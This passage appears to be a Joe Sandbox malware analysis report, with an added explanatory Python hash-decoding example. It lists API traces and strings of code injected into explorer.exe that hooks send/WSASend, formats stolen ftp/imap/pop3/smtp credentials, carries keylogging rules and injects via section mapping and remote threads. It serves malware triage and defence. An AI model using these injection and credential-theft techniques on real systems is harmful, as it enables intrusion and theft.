                                                                                                                                                      • Instruction Fuzzy Hash: C6110AB1900508BFDB119B99EC88EAEBFBCFB48741F1140A5F605E2160DBB18F599B61
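The CryptoAPI sequence above is a plain hash-to-hex routine: CryptAcquireContextA with provider type 00000001 (PROV_RSA_FULL) and flags F0000000 (CRYPT_VERIFYCONTEXT), CryptCreateHash with ALG_ID 00008003 (CALG_MD5), lstrlen to size a C string, CryptHashData, CryptGetHashParam with 00000002 (HP_HASHVAL) and a wsprintfA "%02X" loop over the digest. The record that follows builds its input with GetModuleFileNameA and GetCurrentProcessId through wsprintfA before calling this routine; the format string itself is not shown in the report. The block below is an added example written for this page, not code from the sample or from Joe Sandbox: it decodes any ALG_ID by its wincrypt.h bit layout and reproduces the routine's output with hashlib, including the lstrlen truncation at the first NUL and the provider-type restriction (PROV_RSA_FULL does not offer SHA-2; PROV_RSA_AES, type 24, does). The sample input in the `__main__` block is constructed and is not the sample's real format.

```python
"""Reproduce the hash the CryptoAPI sequence above produces and decode the
ALG_ID it is created with. Added example, not code from the sample or the report."""
import hashlib

# ALG_ID layout (wincrypt.h): class in bits 13-15, type in bits 9-12, sub-id in bits 0-8.
ALG_CLASSES = {0: "ALG_CLASS_ANY", 1: "ALG_CLASS_SIGNATURE", 2: "ALG_CLASS_MSG_ENCRYPT",
               3: "ALG_CLASS_DATA_ENCRYPT", 4: "ALG_CLASS_HASH", 5: "ALG_CLASS_KEY_EXCHANGE"}
HASH_SIDS = {1: "MD2", 2: "MD4", 3: "MD5", 4: "SHA1", 5: "MAC", 9: "HMAC",
             12: "SHA_256", 13: "SHA_384", 14: "SHA_512"}
HASHLIB_NAMES = {"MD5": "md5", "SHA1": "sha1", "SHA_256": "sha256",
                 "SHA_384": "sha384", "SHA_512": "sha512"}
PROV_RSA_FULL, PROV_RSA_AES = 1, 24
CRYPT_VERIFYCONTEXT = 0xF0000000       # the F0000000 flag in CryptAcquireContextA above
HP_HASHVAL = 2                         # the 00000002 parameter in CryptGetHashParam above
# Hash algorithms each legacy provider type accepts in CryptCreateHash.
PROVIDER_HASHES = {
    PROV_RSA_FULL: {"MD2", "MD4", "MD5", "SHA1", "MAC", "HMAC"},
    PROV_RSA_AES: {"MD2", "MD4", "MD5", "SHA1", "MAC", "HMAC", "SHA_256", "SHA_384", "SHA_512"},
}

def decode_alg_id(alg_id: int):
    """Split an ALG_ID into (class name, type field, algorithm name)."""
    cls = (alg_id >> 13) & 0x7
    typ = (alg_id >> 9) & 0xF
    sid = alg_id & 0x1FF
    name = HASH_SIDS.get(sid, f"SID_{sid}") if cls == 4 else f"SID_{sid}"
    return ALG_CLASSES.get(cls, f"CLASS_{cls}"), typ, name

def cryptoapi_hash_hex(data: bytes, alg_id: int = 0x8003, prov_type: int = PROV_RSA_FULL) -> str:
    """lstrlen + CryptHashData + CryptGetHashParam(HP_HASHVAL) + wsprintfA("%02X") per byte."""
    cls, _, algo = decode_alg_id(alg_id)
    if cls != "ALG_CLASS_HASH" or algo not in PROVIDER_HASHES.get(prov_type, set()):
        # CryptCreateHash fails with NTE_BAD_ALGID for an algorithm the provider lacks.
        raise ValueError(f"NTE_BAD_ALGID: {algo} not offered by provider type {prov_type}")
    if algo not in HASHLIB_NAMES:
        raise ValueError(f"{algo} has no hashlib equivalent in this example")
    c_string = data.split(b"\x00", 1)[0]          # lstrlen stops at the first NUL
    digest = hashlib.new(HASHLIB_NAMES[algo], c_string).digest()
    return "".join("%02X" % b for b in digest)    # upper-case, two digits per byte

if __name__ == "__main__":
    print(decode_alg_id(0x8003))
    # Constructed input: the real wsprintfA format the sample uses is not shown in the report.
    print(cryptoapi_hash_hex(b"C:\\Windows\\explorer.exe 4312"))
```

Reading the constants this way matters when triaging a report: CALG_MD5 versus CALG_SHA_256 tells you which digest to recompute when you try to reproduce a bot identifier or a C2 path component from a sample's own inputs, and an unsupported provider/algorithm pair explains a CryptCreateHash that returns without any hash output.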

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
                                                                                                                                                        • Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0086109E,?,00861010), ref: 0086134A
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000003,?,0086109E,?,00861010), ref: 0086135B
                                                                                                                                                      • wsprintfA.USER32 ref: 00861372
                                                                                                                                                        • Part of subcall function 0086263E: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0086265A
                                                                                                                                                        • Part of subcall function 0086263E: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00862672
                                                                                                                                                        • Part of subcall function 0086263E: lstrlen.KERNEL32(?,00000000), ref: 0086267A
                                                                                                                                                        • Part of subcall function 0086263E: CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00862685
                                                                                                                                                        • Part of subcall function 0086263E: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0086269F
                                                                                                                                                        • Part of subcall function 0086263E: wsprintfA.USER32 ref: 008626B6
                                                                                                                                                        • Part of subcall function 0086263E: CryptDestroyHash.ADVAPI32(?), ref: 008626CF
                                                                                                                                                        • Part of subcall function 0086263E: CryptReleaseContext.ADVAPI32(?,00000000), ref: 008626D9
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00861389
                                                                                                                                                      • GetLastError.KERNEL32 ref: 0086138F
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 008613A1
                                                                                                                                                        • Part of subcall function 008624D5: GetCurrentProcessId.KERNEL32 ref: 008624E7
                                                                                                                                                        • Part of subcall function 008624D5: GetCurrentThreadId.KERNEL32 ref: 008624EF
                                                                                                                                                        • Part of subcall function 008624D5: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008624FF
                                                                                                                                                        • Part of subcall function 008624D5: Thread32First.KERNEL32(00000000,0000001C), ref: 0086250D
                                                                                                                                                        • Part of subcall function 008624D5: CloseHandle.KERNEL32(00000000), ref: 00862566
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,send), ref: 008613B8
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 008613BF
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ws2_32.dll,WSASend), ref: 008613E4
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 008613EB
                                                                                                                                                        • Part of subcall function 00861DE3: RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 00861E1D
                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 0086141D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Crypt$Hash$CreateCurrentHandleModuleProcess$AddressContextHeapProcThreadwsprintf$AcquireAllocateCloseDataDestroyErrorExitFileFirstLastMemoryMoveMutexNameParamReleaseSleepSnapshotThread32Toolhelp32Userlstrlen
                                                                                                                                                      • String ID: %s%d%d%d$WSASend$send$ws2_32.dll
                                                                                                                                                      • API String ID: 706757162-1430290102
                                                                                                                                                      • Opcode ID: 79f9d1d4366de0cca2e50f1145975fb9bbdfd7ea6ead8ec5dc42e576cf9bb2f0
                                                                                                                                                      • Instruction ID: d897a564760335fcb78028225e20c8813e1ce4ec007f9a281e3c75d5255225fa
                                                                                                                                                      • Opcode Fuzzy Hash: 79f9d1d4366de0cca2e50f1145975fb9bbdfd7ea6ead8ec5dc42e576cf9bb2f0
                                                                                                                                                      • Instruction Fuzzy Hash: 15316F30740A14BBCF006FA4DD1AB9E3A66FB15B42F065064F606D72A2CFB58A158796

                                                                                                                                                      Control-flow Graph

control_flow_graph 236 861647-86165a 237 861660-861662 236->237 238 861748-86174f 236->238 237->238 239 861668-86166b 237->239 239->238 240 861671-86167d lstrlen 239->240 241 861747 240->241 242 861683-86168a lstrlen 240->242 241->238 242->241 243 861690-8616a8 getpeername 242->243 243->241 244 8616ae-8616ca inet_ntoa htons 243->244 244->241 245 8616cc-8616d4 244->245 246 8616d6-8616d9 245->246 247 861708 245->247 249 8616f3-8616f8 246->249 250 8616db-8616de 246->250 248 86170d-86173c call 862861 wsprintfA call 8624ae 247->248 248->241 260 86173e-861745 call 862843 248->260 249->248 252 8616e0-8616e3 250->252 253 861701-861706 250->253 255 8616e5-8616ea 252->255 256 8616fa-8616ff 252->256 253->248 255->249 258 8616ec-8616f1 255->258 256->248 258->241 258->249 260->241
APIs
Strings
Memory Dump Source
• Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_861000_explorer.jbxd
Yara matches
Similarity
• API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
• String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
• API String ID: 3379139566-1703351401
• Opcode ID: 1d31c629f3277bf56f48770944b905151ea2b2e5972cfe8ec06edffd12d2132e
• Instruction ID: a957ef198e6d4014e44cb11ea6fdc534364acb362a7ea1c34c6a9e1b36a4f7fa
• Opcode Fuzzy Hash: 1d31c629f3277bf56f48770944b905151ea2b2e5972cfe8ec06edffd12d2132e
• Instruction Fuzzy Hash: 6B21B576E002096B9F115EED8C8C5BE7AA9FB45702F0F4075E904D321ADA70CE049B91

Control-flow Graph

control_flow_graph 268 861752-861774 GetModuleHandleA GetProcAddress 269 861776-8617c0 RtlZeroMemory * 4 268->269 270 8617c1-8617c6 268->270 269->270
APIs
• GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,00861539,?,?,?,0086144B,?), ref: 00861763
• GetProcAddress.KERNEL32(00000000), ref: 0086176A
• RtlZeroMemory.NTDLL(00864228,00000104), ref: 00861788
• RtlZeroMemory.NTDLL(00864118,00000104), ref: 00861790
• RtlZeroMemory.NTDLL(00864330,00000104), ref: 00861798
• RtlZeroMemory.NTDLL(00864000,00000104), ref: 008617A1
Strings
Memory Dump Source
• Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_861000_explorer.jbxd
Yara matches
Similarity
• API ID: MemoryZero$AddressHandleModuleProc
• String ID: %s%s%s%s$ntdll.dll$sscanf
• API String ID: 1490332519-278825019
• Opcode ID: b37293e2cf831594576d9c4556461e74b9637e440a77baf1d06baf7c392cf90d
• Instruction ID: f5f9444018879bbc3cdc8a3a843908f86c42f3769dbcd0f9fdc320c2a11b7241
• Opcode Fuzzy Hash: b37293e2cf831594576d9c4556461e74b9637e440a77baf1d06baf7c392cf90d
• Instruction Fuzzy Hash: E3F08222B8072C37852022AA6C1AD4FBE5CFA52FA63132155F624E3382C8AE690446F5

Control-flow Graph

APIs
• GetCurrentProcessId.KERNEL32 ref: 008624E7
• GetCurrentThreadId.KERNEL32 ref: 008624EF
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 008624FF
• Thread32First.KERNEL32(00000000,0000001C), ref: 0086250D
• OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0086252C
• SuspendThread.KERNEL32(00000000), ref: 0086253C
• CloseHandle.KERNEL32(00000000), ref: 0086254B
• Thread32Next.KERNEL32(00000000,0000001C), ref: 0086255B
• CloseHandle.KERNEL32(00000000), ref: 00862566
Memory Dump Source
• Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_861000_explorer.jbxd
Yara matches
Similarity
• API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
• String ID:
• API String ID: 1467098526-0
• Opcode ID: ef4fa933c3b6e025d5b4df09adfcbeb749069ae00e7b5c6750c028b9620400e4
• Instruction ID: c94a0483dc74cd33ef4391150d0a8845ca96e8256f5699667c48b0ad4b2f2768
• Opcode Fuzzy Hash: ef4fa933c3b6e025d5b4df09adfcbeb749069ae00e7b5c6750c028b9620400e4
• Instruction Fuzzy Hash: C3115B71408B05EFD7119F60AC4CB6EBBB8FF99715F061569FA42D2150D7B08A0D8BA3

Control-flow Graph

control_flow_graph 282 861f4a-861fa5 call 8622b8 call 862861 call 8627e2 call 862374 291 861fa7-861fbe 282->291 292 861fc0-861fcc 282->292 295 861fd0-861fd2 291->295 292->295 296 8622a6-8622b5 call 862843 295->296 297 861fd8-86200f RtlZeroMemory 295->297 301 862015-862030 297->301 302 86229e-8622a5 297->302 303 862062-862074 301->303 304 862032-862043 call 8622e5 301->304 302->296 311 862078-86207a 303->311 309 862056 304->309 310 862045-862054 304->310 312 862058-862060 309->312 310->312 313 862080-8620dc call 862731 311->313 314 86228b-862291 311->314 312->311 322 862284 313->322 323 8620e2-8620e7 313->323 316 862293-862295 call 862843 314->316 317 86229a 314->317 316->317 317->302 322->314 324 862101-86212f call 862861 wsprintfW 323->324 325 8620e9-8620fa 323->325 328 862131-862133 324->328 329 862148-86215f 324->329 325->324 330 862134-862137 328->330 335 862161-862197 call 862861 wsprintfW 329->335 336 86219e-8621b8 329->336 331 862142-862144 330->331 332 862139-86213e 330->332 331->329 332->330 334 862140 332->334 334->329 335->336 340 862261-862277 call 862843 336->340 341 8621be-8621d1 336->341 349 862280 340->349 350 862279-86227b call 862843 340->350 341->340 344 8621d7-8621ed call 862861 341->344 351 8621ef-8621fa 344->351 349->322 350->349 353 86220e-862225 351->353 354 8621fc-862209 call 862826 351->354 358 862227 353->358 359 862229-862236 353->359 354->353 358->359 359->351 360 862238-86223c 359->360 361 862256-86225d call 862843 360->361 362 86223e 360->362 361->340 363 86223e call 862815 362->363 365 862243-862250 RtlMoveMemory 363->365 365->361
APIs
  • Part of subcall function 00862861: GetProcessHeap.KERNEL32(00000008,0000A000,008610CC), ref: 00862864
  • Part of subcall function 00862861: RtlAllocateHeap.NTDLL(00000000), ref: 0086286B
  • Part of subcall function 008627E2: lstrlen.KERNEL32(008640DA,?,00000000,00000000,00861F86,771A8A60,008640DA,00000000), ref: 008627EA
  • Part of subcall function 008627E2: MultiByteToWideChar.KERNEL32(00000000,00000000,008640DA,00000001,00000000,00000000), ref: 008627FC
  • Part of subcall function 00862374: RtlZeroMemory.NTDLL(?,00000018), ref: 00862386
• RtlZeroMemory.NTDLL(?,0000003C), ref: 00861FE2
• wsprintfW.USER32 ref: 0086211B
• wsprintfW.USER32 ref: 00862186
• RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00862250
Strings
Memory Dump Source
• Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_861000_explorer.jbxd
Yara matches
Similarity
• API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
• String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
• API String ID: 4204651544-1701262698
• Opcode ID: 9c3f9e45f757394c9be7d926749b793a67005ab033bdb4632d3202140cc2c424
• Instruction ID: 03a743ec9a5e759dd6c2ca9d16334c60dfebf5fad95d3f12bc3c9696deed9ad6
• Opcode Fuzzy Hash: 9c3f9e45f757394c9be7d926749b793a67005ab033bdb4632d3202140cc2c424
• Instruction Fuzzy Hash: 4FA17B71608B05AFD710DF68DC85A2BBBE8FB89340F12486DF985D3361DA74DE088B52

Control-flow Graph

control_flow_graph 367 8625ad-8625c9 OpenProcess 368 862600-862607 367->368 369 8625cb-8625da IsWow64Process 367->369 370 8625f7 369->370 371 8625dc-8625ec IsWow64Process 369->371 373 8625f9-8625fa CloseHandle 370->373 372 8625ee-8625f5 371->372 371->373 372->373 373->368
APIs
• OpenProcess.KERNEL32(00000400,00000000,?,771AE800,?,?,microsoftedgecp.exe,00861287), ref: 008625BF
• IsWow64Process.KERNEL32(000000FF,?), ref: 008625D1
• IsWow64Process.KERNEL32(00000000,?), ref: 008625E4
• CloseHandle.KERNEL32(00000000), ref: 008625FA
Strings
Memory Dump Source
• Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                                                      • String ID: microsoftedgecp.exe
                                                                                                                                                      • API String ID: 331459951-1475183003
                                                                                                                                                      • Opcode ID: e496275f760bdb453693dde2af148ff2471601d2b5a8fd422dc9a76a8f39963d
                                                                                                                                                      • Instruction ID: 979cb695ee983568638bfe69778ef85c84dbc133ac2dcfe0dc272196686af819
                                                                                                                                                      • Opcode Fuzzy Hash: e496275f760bdb453693dde2af148ff2471601d2b5a8fd422dc9a76a8f39963d
                                                                                                                                                      • Instruction Fuzzy Hash: 2FF09071902A2CFF9B10CF909E888EE776CFB01265B1512AAF901D2140D7714F08EAA1

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 00861B4E
                                                                                                                                                      • LoadLibraryA.KERNEL32(?,00864434,00000000,00000000,771B2EE0,00000000,00861910,?,?,?,00000001,?,00000000), ref: 00861B76
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00861BA3
                                                                                                                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00861BF4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, Offset: 00861000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_20_2_861000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3827878703-0
                                                                                                                                                      • Opcode ID: e25abe9e794951c35f4bae7eaa1b031183a134c6e30e07cb8c41b44693007f26
                                                                                                                                                      • Instruction ID: 48518124a8ad8feef54403d0bf4563c4d77921718028871a70366fcd03b15579
                                                                                                                                                      • Opcode Fuzzy Hash: e25abe9e794951c35f4bae7eaa1b031183a134c6e30e07cb8c41b44693007f26
                                                                                                                                                      • Instruction Fuzzy Hash: 2931A375700616ABCF24CF29C888B76B7E8FF05325F1A456CE846C7202E731E845CBA0

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:8.8%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:9
                                                                                                                                                      Total number of Limit Nodes:2

                                                                                                                                                      Callgraph


                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL ref: 009E35D8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_9e1000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: SectionUnmapView
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 498011366-0
                                                                                                                                                      • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                      • Instruction ID: 161058fbc1f8794c28319659e96f620fa80268443f6ca9dc08941d8a1374d923
                                                                                                                                                      • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                                                      • Instruction Fuzzy Hash: 8A11C430611A495FEB59BBBAD89E37937A4FB54302F54412AA419C76A1DE398E40C701

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_9e1000_explorer.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2482764027-0
                                                                                                                                                      • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                      • Instruction ID: a15d268467de19eed6c2fb27eee3e17e836bfe60647c8800b8495b4bc1a6b47f
                                                                                                                                                      • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                                                      • Instruction Fuzzy Hash: FB8121312186488FE716DF15E858FEAB7A5FB94740F04861AA046C31B0EF78DE04CB81

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE ref: 009EA147
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 009EA1BB
                                                                                                                                                      • VirtualProtect.KERNELBASE ref: 009EA1D9
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.2523151456.00000000009E7000.00000040.80000000.00040000.00000000.sdmp, Offset: 009E7000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_9e7000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual$LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 895956442-0
                                                                                                                                                      • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                      • Instruction ID: 1284d51a08816201a3f413dbcbbdc6a923261b828f71bc1deff1cf11c9a2d005
                                                                                                                                                      • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                                                      • Instruction Fuzzy Hash: B2519E3135C99E4BCB26AA3D9CC46F5B7C5E75A326F14072AD08AC32A4D559FC468383

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:15.1%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.6%
                                                                                                                                                      Signature Coverage:18.6%
                                                                                                                                                      Total number of Nodes:328
                                                                                                                                                      Total number of Limit Nodes:7
949->948 950 1b1abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 949->950 950->948 952 1b2724 VirtualQuery 951->952 953 1b29f3 952->953 954 1b2a07 953->954 955 1b29f7 GetProcessHeap HeapFree 953->955 954->845 955->954 956->838 957->898 958->911 960 1b130c RtlZeroMemory 959->960 960->904 960->905 962 1b25a1 961->962 963 1b2577 lstrlen RtlMoveMemory 961->963 962->911 963->962 965->910 967 1b1b3a 966->967 969 1b195a 966->969 968 1b1b4a NtCreateSection 967->968 970 1b1b69 967->970 968->970 969->932 970->969 971 1b1b7e NtMapViewOfSection 970->971 971->969 973 1b1bd4 972->973 979 1b1c06 972->979 974 1b1bd6 RtlMoveMemory 973->974 974->974 974->979 975 1b1c69 976 1b19b6 NtUnmapViewOfSection 975->976 977 1b1c87 LdrProcessRelocationBlock 975->977 976->939 977->975 977->976 978 1b1c17 LoadLibraryA 978->976 978->979 979->975 979->978 980 1b1c47 GetProcAddress 979->980 980->976 980->979 981->863 982->865 984 1b1445 CreateMutexA GetLastError 983->984 985 1b27bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 983->985 984->868 984->869 986 1b2805 wsprintfA 985->986 986->986 987 1b2827 CryptDestroyHash CryptReleaseContext 986->987 987->984 988->873 992 1b2631 989->992 990 1b2681 CloseHandle 990->877 991 1b2671 Thread32Next 991->992 992->990 992->991 993 1b263d OpenThread 992->993 994 1b2658 SuspendThread 993->994 995 1b2660 ResumeThread 993->995 996 1b2666 CloseHandle 994->996 995->996 996->991 998 1b1f44 997->998 999 1b1fad 997->999 998->999 1016 1b1fea VirtualProtect 998->1016 999->878 1001 1b1f5b 1001->999 1017 1b29bd VirtualAlloc 1001->1017 1003 1b1f67 1004 1b1f84 1003->1004 1005 1b1f71 RtlMoveMemory 1003->1005 1018 1b1fea VirtualProtect 1004->1018 1005->1004 1008 1b2724 VirtualQuery 1007->1008 1009 1b1e93 1008->1009 1010 1b14fa 1009->1010 1019 1b1ed8 1009->1019 1010->887 1014 1b1eba 1014->1010 1024 1b1fea VirtualProtect 1014->1024 1016->1001 1017->1003 1018->999 1021 1b1eea 1019->1021 1022 1b1e9e 1019->1022 1020 1b1f04 lstrcmp 1020->1021 1020->1022 
1021->1020 1021->1022 1022->1010 1023 1b1fea VirtualProtect 1022->1023 1023->1014 1024->1010

Callgraph

Control-flow Graph

APIs
  • Part of subcall function 001B2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,001B29F3,-00000001,001B128C), ref: 001B2731
  • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
  • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
• RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 001B1038
• RtlMoveMemory.NTDLL(00000000,?,?), ref: 001B106C
• NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 001B1075
• GetCurrentProcessId.KERNEL32(?,001B1010), ref: 001B107B
• wsprintfA.USER32 ref: 001B10E7
• RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 001B1155
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001B1160
• Process32First.KERNEL32(00000000,?), ref: 001B117F
• CharLowerA.USER32(?), ref: 001B1199
• lstrcmpiA.KERNEL32(?,explorer.exe), ref: 001B11B5
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001B1212
• Process32Next.KERNEL32(00000000,00000128), ref: 001B126C
• CloseHandle.KERNELBASE(00000000), ref: 001B127F
• Sleep.KERNELBASE(000003E8), ref: 001B129F
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
• String ID: %s%s$0-vwP,vw$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
• API String ID: 3206029838-2315131256
• Opcode ID: 7b70b25164e8e2169c1cb54b7ff73dd42dfce4d2700708fbbf5bfa7b92f48398
• Instruction ID: 7500cddfb38b1ad173460b7f5eb4a32dee59fa27a8e264f30fbd65b58effc8e0
• Opcode Fuzzy Hash: 7b70b25164e8e2169c1cb54b7ff73dd42dfce4d2700708fbbf5bfa7b92f48398
• Instruction Fuzzy Hash: DC511630204300ABC714FF74DC99AFA77AAEF59740F51072CF965876E1EB349E898A61

Control-flow Graph

APIs
  • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
  • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
• wsprintfA.USER32 ref: 001B10E7
  • Part of subcall function 001B276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 001B2777
  • Part of subcall function 001B276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,001B10FE), ref: 001B2789
• RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 001B1155
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001B1160
• Process32First.KERNEL32(00000000,?), ref: 001B117F
• CharLowerA.USER32(?), ref: 001B1199
• lstrcmpiA.KERNEL32(?,explorer.exe), ref: 001B11B5
• lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 001B1212
• Process32Next.KERNEL32(00000000,00000128), ref: 001B126C
• CloseHandle.KERNELBASE(00000000), ref: 001B127F
• Sleep.KERNELBASE(000003E8), ref: 001B129F
Strings
Memory Dump Source
• Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
Similarity
• API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
• String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
• API String ID: 3018447944-2805246637
